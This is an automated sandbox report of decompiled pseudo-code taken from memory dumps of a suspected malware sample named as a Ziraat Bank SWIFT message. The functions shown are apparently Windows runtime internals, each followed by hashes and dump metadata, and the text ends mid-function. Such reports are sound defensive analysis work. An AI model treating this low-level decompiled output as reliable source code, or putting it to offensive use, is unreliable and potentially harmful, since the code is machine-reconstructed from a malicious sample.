                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    				}
                                                                    				_push( &_v72);
                                                                    				_push(0x14);
                                                                    				_push(0x20402);
                                                                    				_push( *_t18 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                    			}
















                                                                    0x01968a62
                                                                    0x01968a71
                                                                    0x01968a79
                                                                    0x01968a82
                                                                    0x01968a85
                                                                    0x01968a89
                                                                    0x01968a8c
                                                                    0x01968a8f
                                                                    0x01968a92
                                                                    0x01968a95
                                                                    0x01968a9f
                                                                    0x01968ab1
                                                                    0x01968aa1
                                                                    0x01968aaa
                                                                    0x01968aaa
                                                                    0x01968abc
                                                                    0x01968abd
                                                                    0x01968abf
                                                                    0x01968ac4
                                                                    0x01968ada

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5b287b2cbd83300637e39600862b8be5a87d662b736564764f0bb0c91bb0ea3
                                                                    • Instruction ID: eb2f65f7a953132e5d2eed9ee79ccb0927cc861b252b3b6be31a89a556160edb
                                                                    • Opcode Fuzzy Hash: e5b287b2cbd83300637e39600862b8be5a87d662b736564764f0bb0c91bb0ea3
                                                                    • Instruction Fuzzy Hash: C7012C71A0131DAFCB04DFA9D9419EEBBB8EF58310F10405AFA04E7381D634AA00CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0189DB60(signed int __ecx) {
                                                                    				intOrPtr* _t9;
                                                                    				void* _t12;
                                                                    				void* _t13;
                                                                    				intOrPtr _t14;
                                                                    
                                                                    				_t9 = __ecx;
                                                                    				_t14 = 0;
                                                                    				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                    					_t13 = 0xc000000d;
                                                                    				} else {
                                                                    					_t14 = E0189DB40();
                                                                    					if(_t14 == 0) {
                                                                    						_t13 = 0xc0000017;
                                                                    					} else {
                                                                    						_t13 = E0189E7B0(__ecx, _t12, _t14, 0xfff);
                                                                    						if(_t13 < 0) {
                                                                    							L0189E8B0(__ecx, _t14, 0xfff);
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                    							_t14 = 0;
                                                                    						} else {
                                                                    							_t13 = 0;
                                                                    							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				 *_t9 = _t14;
                                                                    				return _t13;
                                                                    			}







                                                                    0x0189db64
                                                                    0x0189db66
                                                                    0x0189db6b
                                                                    0x0189dbaa
                                                                    0x0189db71
                                                                    0x0189db76
                                                                    0x0189db7a
                                                                    0x0189dba3
                                                                    0x0189db7c
                                                                    0x0189db87
                                                                    0x0189db8b
                                                                    0x018f4fa1
                                                                    0x018f4fb3
                                                                    0x018f4fb8
                                                                    0x0189db91
                                                                    0x0189db96
                                                                    0x0189db98
                                                                    0x0189db98
                                                                    0x0189db8b
                                                                    0x0189db7a
                                                                    0x0189db9d
                                                                    0x0189dba2

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                    • Instruction ID: 373783a2279b4e4f36d898ae9578dd304ad589f0c6d34f25259501d6cce8517d
                                                                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                    • Instruction Fuzzy Hash: E8F0FC332016239BDB325ADD48D0F6BBA958FD1B64F1D0135F205EB344C9608E0286D9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0189B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                    				signed char* _t13;
                                                                    				intOrPtr _t22;
                                                                    				char _t23;
                                                                    
                                                                    				_t23 = __edx;
                                                                    				_t22 = __ecx;
                                                                    				if(E018B7D50() != 0) {
                                                                    					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                    				} else {
                                                                    					_t13 = 0x7ffe0384;
                                                                    				}
                                                                    				if( *_t13 != 0) {
                                                                    					_t13 =  *[fs:0x30];
                                                                    					if((_t13[0x240] & 0x00000004) == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t13 = 0x7ffe0385;
                                                                    					} else {
                                                                    						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                    					}
                                                                    					if(( *_t13 & 0x00000020) == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    					return E01917016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                    				} else {
                                                                    					L3:
                                                                    					return _t13;
                                                                    				}
                                                                    			}






                                                                    0x0189b1e8
                                                                    0x0189b1ea
                                                                    0x0189b1f3
                                                                    0x018f4a17
                                                                    0x0189b1f9
                                                                    0x0189b1f9
                                                                    0x0189b1f9
                                                                    0x0189b201
                                                                    0x018f4a21
                                                                    0x018f4a2e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f4a3b
                                                                    0x018f4a4d
                                                                    0x018f4a3d
                                                                    0x018f4a46
                                                                    0x018f4a46
                                                                    0x018f4a55
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0189b20a
                                                                    0x0189b20a
                                                                    0x0189b20a
                                                                    0x0189b20a

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                    • Instruction ID: 252ab5d861b581046ea436424a0bc1dc1442332ef44e6366184e3a0caef80c35
                                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                    • Instruction Fuzzy Hash: 4301F4322006849BD722979DD844F6A7B99EF91754F0C00A6FA15CB6B2D778DA00C325
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 46%
                                                                    			E0192FE87(intOrPtr __ecx) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				signed int _v24;
                                                                    				intOrPtr _v28;
                                                                    				short _v54;
                                                                    				char _v60;
                                                                    				signed char* _t21;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr _t32;
                                                                    				intOrPtr _t33;
                                                                    				intOrPtr _t34;
                                                                    				signed int _t35;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t35;
                                                                    				_v16 = __ecx;
                                                                    				_v54 = 0x1722;
                                                                    				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                    				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                    				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t21 = 0x7ffe0382;
                                                                    				} else {
                                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                    				}
                                                                    				_push( &_v60);
                                                                    				_push(0x10);
                                                                    				_push(0x20402);
                                                                    				_push( *_t21 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                    			}
















                                                                    0x0192fe96
                                                                    0x0192fe9e
                                                                    0x0192fea1
                                                                    0x0192fead
                                                                    0x0192feb3
                                                                    0x0192feb9
                                                                    0x0192fec3
                                                                    0x0192fed5
                                                                    0x0192fec5
                                                                    0x0192fece
                                                                    0x0192fece
                                                                    0x0192fee0
                                                                    0x0192fee1
                                                                    0x0192fee3
                                                                    0x0192fee8
                                                                    0x0192fefb

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 79a7e0f61a0ed9c35aea20522d7a6ec12cb42e6aee321b551161a64b9a9c019c
                                                                    • Instruction ID: 63bf49b6773908143ad009cd522cae3686db6fb9d89b62e8692763ae26e012ac
                                                                    • Opcode Fuzzy Hash: 79a7e0f61a0ed9c35aea20522d7a6ec12cb42e6aee321b551161a64b9a9c019c
                                                                    • Instruction Fuzzy Hash: 73016271A04319AFCB14DFACD541A6EB7F4EF04704F144559E508DB382D635EA01CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 48%
                                                                    			E0195131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				short _v50;
                                                                    				char _v56;
                                                                    				signed char* _t18;
                                                                    				intOrPtr _t24;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t31;
                                                                    				signed int _t32;
                                                                    
                                                                    				_t29 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t32;
                                                                    				_v20 = _a4;
                                                                    				_v12 = _a8;
                                                                    				_v24 = __ecx;
                                                                    				_v16 = __edx;
                                                                    				_v50 = 0x1021;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t18 = 0x7ffe0380;
                                                                    				} else {
                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    				}
                                                                    				_push( &_v56);
                                                                    				_push(0x10);
                                                                    				_push(0x20402);
                                                                    				_push( *_t18 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                    			}















                                                                    0x0195131b
                                                                    0x0195132a
                                                                    0x01951330
                                                                    0x01951336
                                                                    0x0195133e
                                                                    0x01951341
                                                                    0x01951344
                                                                    0x0195134f
                                                                    0x01951361
                                                                    0x01951351
                                                                    0x0195135a
                                                                    0x0195135a
                                                                    0x0195136c
                                                                    0x0195136d
                                                                    0x0195136f
                                                                    0x01951374
                                                                    0x01951387

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab0212671995e34087292121a07c393426360084019c5af54c4b911adf702ab5
                                                                    • Instruction ID: d7021566efe12e018a761338089337f65080d0279ce4c32a16aeb8459af218bd
                                                                    • Opcode Fuzzy Hash: ab0212671995e34087292121a07c393426360084019c5af54c4b911adf702ab5
                                                                    • Instruction Fuzzy Hash: 73013C71A05249AFCB44EFADE545AAEB7F4FF58700F00406AFD05EB381E634AA00CB55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 48%
                                                                    			E01968F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				short _v50;
                                                                    				char _v56;
                                                                    				signed char* _t18;
                                                                    				intOrPtr _t24;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t31;
                                                                    				signed int _t32;
                                                                    
                                                                    				_t29 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t32;
                                                                    				_v16 = __ecx;
                                                                    				_v50 = 0x1c2c;
                                                                    				_v24 = _a4;
                                                                    				_v20 = _a8;
                                                                    				_v12 = __edx;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t18 = 0x7ffe0386;
                                                                    				} else {
                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    				}
                                                                    				_push( &_v56);
                                                                    				_push(0x10);
                                                                    				_push(0x402);
                                                                    				_push( *_t18 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                    			}















                                                                    0x01968f6a
                                                                    0x01968f79
                                                                    0x01968f81
                                                                    0x01968f84
                                                                    0x01968f8b
                                                                    0x01968f91
                                                                    0x01968f94
                                                                    0x01968f9e
                                                                    0x01968fb0
                                                                    0x01968fa0
                                                                    0x01968fa9
                                                                    0x01968fa9
                                                                    0x01968fbb
                                                                    0x01968fbc
                                                                    0x01968fbe
                                                                    0x01968fc3
                                                                    0x01968fd6

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3c2c4430d27d9c01095cc0513960a1f24e2fed50f9ac4c60bf685de9576306c
                                                                    • Instruction ID: d2e96f235df2f410adcccf8ed48e9cc339c8df8eb3ed9093f93cf634a40e5ee2
                                                                    • Opcode Fuzzy Hash: f3c2c4430d27d9c01095cc0513960a1f24e2fed50f9ac4c60bf685de9576306c
                                                                    • Instruction Fuzzy Hash: 6F013175A05309AFDB04DFA8D545AAEBBF8EF58300F104459B905EB380DA74DA00CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 46%
                                                                    			E01951608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				short _v46;
                                                                    				char _v52;
                                                                    				signed char* _t15;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr _t28;
                                                                    				signed int _t29;
                                                                    
                                                                    				_t26 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t29;
                                                                    				_v12 = _a4;
                                                                    				_v20 = __ecx;
                                                                    				_v16 = __edx;
                                                                    				_v46 = 0x1024;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t15 = 0x7ffe0380;
                                                                    				} else {
                                                                    					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    				}
                                                                    				_push( &_v52);
                                                                    				_push(0xc);
                                                                    				_push(0x20402);
                                                                    				_push( *_t15 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                                    			}














                                                                    0x01951608
                                                                    0x01951617
                                                                    0x0195161d
                                                                    0x01951625
                                                                    0x01951628
                                                                    0x0195162b
                                                                    0x01951636
                                                                    0x01951648
                                                                    0x01951638
                                                                    0x01951641
                                                                    0x01951641
                                                                    0x01951653
                                                                    0x01951654
                                                                    0x01951656
                                                                    0x0195165b
                                                                    0x0195166e

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aac653b8a4afa36f8d4296b20027a94cb9eb4c9e98d7a5195c696fe3305a4437
                                                                    • Instruction ID: 13cbb95c0c21452e532a142bc3835a3cf787912adb3347a86229bc8f31b243d8
                                                                    • Opcode Fuzzy Hash: aac653b8a4afa36f8d4296b20027a94cb9eb4c9e98d7a5195c696fe3305a4437
                                                                    • Instruction Fuzzy Hash: 68F04971A05258AFDB14EFA8D445EAEBBF8AF18300F044069A905EB381EA749A00CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018BC577(void* __ecx, char _a4) {
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				void* _t17;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				void* _t21;
                                                                    
                                                                    				_t18 = __ecx;
                                                                    				_t21 = __ecx;
                                                                    				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E018BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x18711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                    					__eflags = _a4;
                                                                    					if(__eflags != 0) {
                                                                    						L10:
                                                                    						E019688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                    						L9:
                                                                    						return 0;
                                                                    					}
                                                                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                    					if(__eflags == 0) {
                                                                    						goto L10;
                                                                    					}
                                                                    					goto L9;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}









                                                                    0x018bc577
                                                                    0x018bc57d
                                                                    0x018bc581
                                                                    0x018bc5b5
                                                                    0x018bc5b9
                                                                    0x018bc5ce
                                                                    0x018bc5ce
                                                                    0x018bc5ca
                                                                    0x00000000
                                                                    0x018bc5ca
                                                                    0x018bc5c4
                                                                    0x018bc5c8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018bc5ad
                                                                    0x00000000
                                                                    0x018bc5af

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 943fe34e61ba6e83d4526fdcb740ee445584ed5d92920807298b9d2e56d60621
                                                                    • Instruction ID: 5b2e61f26445744a9e610858feb94b977dd06cb3b5ef3c8d164867eed5b39051
                                                                    • Opcode Fuzzy Hash: 943fe34e61ba6e83d4526fdcb740ee445584ed5d92920807298b9d2e56d60621
                                                                    • Instruction Fuzzy Hash: 9BF09AB2915A949EE7368F2C80C4BA27FE8BB05774F448466F61AC7702C7A4DA84C261
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 43%
                                                                    			E01968D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				short _v42;
                                                                    				char _v48;
                                                                    				signed char* _t12;
                                                                    				intOrPtr _t18;
                                                                    				intOrPtr _t24;
                                                                    				intOrPtr _t25;
                                                                    				signed int _t26;
                                                                    
                                                                    				_t23 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t26;
                                                                    				_v16 = __ecx;
                                                                    				_v42 = 0x1c2b;
                                                                    				_v12 = __edx;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t12 = 0x7ffe0386;
                                                                    				} else {
                                                                    					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    				}
                                                                    				_push( &_v48);
                                                                    				_push(8);
                                                                    				_push(0x20402);
                                                                    				_push( *_t12 & 0x000000ff);
                                                                    				return E018DB640(E018D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                    			}













                                                                    0x01968d34
                                                                    0x01968d43
                                                                    0x01968d4b
                                                                    0x01968d4e
                                                                    0x01968d52
                                                                    0x01968d5c
                                                                    0x01968d6e
                                                                    0x01968d5e
                                                                    0x01968d67
                                                                    0x01968d67
                                                                    0x01968d79
                                                                    0x01968d7a
                                                                    0x01968d7c
                                                                    0x01968d81
                                                                    0x01968d94

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a430d84c28d8b04555e97a6a7afb8b9b86ce8dd96053f76585cd8f0b3fe963b
                                                                    • Instruction ID: 5a9cecfbf6edb57eac19b5a224ab9ffdb7c32323c99911418937a816dc9c03d2
                                                                    • Opcode Fuzzy Hash: 6a430d84c28d8b04555e97a6a7afb8b9b86ce8dd96053f76585cd8f0b3fe963b
                                                                    • Instruction Fuzzy Hash: 7FF09070A047089FDB14EBA8D541A6E77B8AB24300F108499E905EB280DA34DA008765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E01952073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                    				void* __esi;
                                                                    				signed char _t3;
                                                                    				signed char _t7;
                                                                    				void* _t19;
                                                                    
                                                                    				_t17 = __ecx;
                                                                    				_t3 = E0194FD22(__ecx);
                                                                    				_t19 =  *0x198849c - _t3; // 0x0
                                                                    				if(_t19 == 0) {
                                                                    					__eflags = _t17 -  *0x1988748; // 0x0
                                                                    					if(__eflags <= 0) {
                                                                    						E01951C06();
                                                                    						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                    						__eflags = _t3;
                                                                    						if(_t3 != 0) {
                                                                    							L5:
                                                                    							__eflags =  *0x1988724 & 0x00000004;
                                                                    							if(( *0x1988724 & 0x00000004) == 0) {
                                                                    								asm("int3");
                                                                    								return _t3;
                                                                    							}
                                                                    						} else {
                                                                    							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                    							__eflags = _t3 - 3;
                                                                    							if(_t3 == 3) {
                                                                    								goto L5;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return _t3;
                                                                    				} else {
                                                                    					_t7 =  *0x1988724; // 0x0
                                                                    					return E01948DF1(__ebx, 0xc0000374, 0x1985890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                    				}
                                                                    			}







                                                                    0x01952076
                                                                    0x01952078
                                                                    0x0195207d
                                                                    0x01952083
                                                                    0x019520a4
                                                                    0x019520aa
                                                                    0x019520ac
                                                                    0x019520b7
                                                                    0x019520ba
                                                                    0x019520bc
                                                                    0x019520c9
                                                                    0x019520c9
                                                                    0x019520d0
                                                                    0x019520d2
                                                                    0x00000000
                                                                    0x019520d2
                                                                    0x019520be
                                                                    0x019520c3
                                                                    0x019520c5
                                                                    0x019520c7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019520c7
                                                                    0x019520bc
                                                                    0x019520d4
                                                                    0x01952085
                                                                    0x01952085
                                                                    0x019520a3
                                                                    0x019520a3

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 625626146cef7c3bcd62a8f06ceda2bb54268ee00c9a0d3f10cc8b92acecef59
                                                                    • Instruction ID: f572663975e6d178b05a7583fb067734bf3612cefa208dd2b61a2ad0bba7064b
                                                                    • Opcode Fuzzy Hash: 625626146cef7c3bcd62a8f06ceda2bb54268ee00c9a0d3f10cc8b92acecef59
                                                                    • Instruction Fuzzy Hash: B1F0A72641B2858BDFB6EB3D65017E97B99D795111F4A0445DD9837209C6358893CB20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 54%
                                                                    			E018D927A(void* __ecx) {
                                                                    				signed int _t11;
                                                                    				void* _t14;
                                                                    
                                                                    				_t11 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                    				if(_t11 != 0) {
                                                                    					E018DFA60(_t11, 0, 0x98);
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                    					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                    					E018D92C6(_t11, _t14);
                                                                    				}
                                                                    				return _t11;
                                                                    			}





                                                                    0x018d9295
                                                                    0x018d9299
                                                                    0x018d929f
                                                                    0x018d92aa
                                                                    0x018d92ad
                                                                    0x018d92ae
                                                                    0x018d92af
                                                                    0x018d92b0
                                                                    0x018d92b4
                                                                    0x018d92bb
                                                                    0x018d92bb
                                                                    0x018d92c5

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                    • Instruction ID: 601e5f600c3ceb8ae5549d7d4f53e629b002dca5715cb65a899d6f47a66ee4c5
                                                                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                    • Instruction Fuzzy Hash: 58E02B327406016BE711AE0DCCC0F47376DDF92724F044078F5009E242C6E5DE0987A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 36%
                                                                    			E01968CD6(intOrPtr __ecx) {
                                                                    				signed int _v8;
